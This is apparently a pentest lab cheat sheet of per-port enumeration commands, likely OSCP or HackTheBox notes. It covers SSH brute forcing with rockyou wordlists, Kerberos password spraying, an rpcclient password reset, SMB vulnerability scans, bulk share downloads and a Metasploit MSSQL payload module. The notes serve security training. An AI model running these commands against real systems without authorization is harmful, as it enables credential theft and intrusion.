# 02 Port Enumeration ## Port 21 - FTP ``` nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.11.1.5 ``` ## Port 22 - SSH try to login with default/simple account : admin:admin, root:root, user:password Brute Force ``` BruteForce: patator ssh_login host=10.11.1.5 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.' hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.11.1.5 medusa -h 10.11.1.5 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.11.1.5 ``` ## Port 25 - SMTP ``` nc -nvv 10.11.1.5 25 HELO foo telnet 10.11.1.5 25 VRFY root ``` > > > ``` > nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.5 > smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.5 > ``` ## Port 53 - DNS ``` dnsrecon -d 10.10.10.192 ``` ## Port 88 - Kerberos ``` nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" 10.11.1.5 ``` {% embed url="" %} ``` python kerbrute.py -dc-ip 10.11.1.5 -users /root/document/ctf/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt ``` ## Port 110 - Pop3 ``` telnet 10.11.1.5 USER fkclai@10.11.1.5 PASS abcd1234 or: USER fkclai PASS abcd1234 # List all emails list ``` ## Port 111 - Rpcbind ``` rpcinfo -p 10.11.1.5 rpcclient -U "" 10.11.1.5 #rpcclient $>srvinfo #rpcclient $>enumdomusers #rpcclient $>querydominfo #rpcclient $>getdompwinfo //password policy #rpcclient $>netshareenum #rpcclient $>enumprivs #rpcclient $>setuserinfo2 23 abcd@1234 ``` ## Port 135 - MSRPC ``` nmap 10.11.1.5 --script=msrpc-enum rpcdump.py 10.10.10.192 -p 135 >> /tmp/rpc.txt ``` ## Port 139/445 - SMB ``` #Eumernation smbmap -H 10.11.1.8 smbmap -u "guest" -p "" -H 10.11.1.31 nmap --script smb-enum-shares -p 139,445 enum4linux nest.htb smbclient -L nest.htb smbclient -U "r.thompson" -L \\\\10.10.10.182 smbclient -L //10.10.10.192 -N # Check vulns nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.8 nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.8 nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.8 nmap --script vuln -p 135,139,445 10.10.10.40 ``` ``` smbmap -u TempUser -p welcome2019 -H nest.htb -R smbclient \\\\nest.htb\\Data -U TempUser smbclient //10.10.10.192/forensic -U audit2020 --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000 mask "" recurse ON prompt OFF mget * ``` ## Port 389,636 LDAP ``` ldapsearch -h 10.11.1.8 -p 389 -x -b "dc=fkclai,dc=com" ldapsearch -x -h 10.11.1.8 -D 'DOMAIN\fkclai' -w 'hash-password' ldapdomaindump 10.11.1.8 -u 'DOMAIN\fkclai' -p 'hash-password' windapsearch.py -d abcde.local --dc-ip 10.10.10.175 -U https://github.com/ropnop/windapsearch ``` ## Port 1433 MSSQL ``` nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.8 #MSF payload use auxiliary/scanner/mssql/mssql_ping use auxiliary/scanner/mssql/mssql_login use exploit/windows/mssql/mssql_payload ```